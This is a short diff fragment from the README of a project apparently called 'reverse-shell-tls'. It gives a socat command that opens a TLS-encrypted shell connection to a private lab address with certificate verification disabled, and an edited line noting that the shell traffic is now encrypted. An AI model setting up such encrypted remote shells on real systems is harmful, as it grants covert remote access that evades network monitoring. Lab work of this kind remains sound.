FrancescoDiSalesGithub/reverse-shell-tls/README.md

 `socat -d openssl:172.18.0.2:5555,verify=0`

-as your run this command you will obtain a dumb shell.
+as your run this command you will obtain a dumb shell, but the commands are now encrypted (check the secret.cap)